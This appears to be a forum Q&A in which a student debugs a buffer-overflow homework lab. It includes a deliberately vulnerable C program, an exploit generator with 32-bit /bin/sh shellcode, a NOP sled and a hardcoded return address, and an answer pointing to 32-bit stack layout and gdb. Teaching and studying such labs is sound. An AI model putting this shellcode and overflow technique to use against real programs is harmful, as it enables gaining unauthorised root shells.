Reputation: 179
Buffer Overflow Attack Segmentation fault (core dumped)
I'm trying to complete my homework assignment on a buffer overflow attack to get into the root shell, but everytime I run my stack.c its giving me a segmentation fault. I was wondering if someone could point me in the right direction. I've
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
This is the one that I've edit.
/* exploit.c*/
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
long buffer_start = 0xbffff174;
long landing = buffer_start + 250;
long* ptr = (long*)(buffer + 24);
*ptr = landing;
memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode));
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
Upvotes: 2
Views: 4120
Answers (1)
Reputation:
Your question is quite puzzling.
Not only it is not clear how you really compile this stuff, neither is how it is being run.
The shellcode in question assumes a 32-bit linux binary. Further, the stack location of a 32-bit binary running on a 64-bit linux differs from what you can expect from running said binary on a 32-bit system. Which in turn means the return address which is put in place of the old one must be computed with taking that into consideration. Chances are your school even told you to run a 32-bit vm or something.
Regardless, your first steps should be to inspect the crash, which you can do with gdb (or other debugger, whatever is used in the class), about which you should have been told.
And here is the classic on the subject, written in 32-bit times: http://phrack.org/issues/49/14.html "Smashing The Stack For Fun And Profit"
Upvotes: 2
Related Questions
- Core dumped, but core file is not in the current directory?
- What is a bus error? Is it different from a segmentation fault?
- What is a segmentation fault?
- Segmentation Fault: Core Dumped
- C - Buffer Overflow Details
- Why is this code vulnerable to buffer overflow attacks?
- x86 Assembly - printf doesn't print without "\n"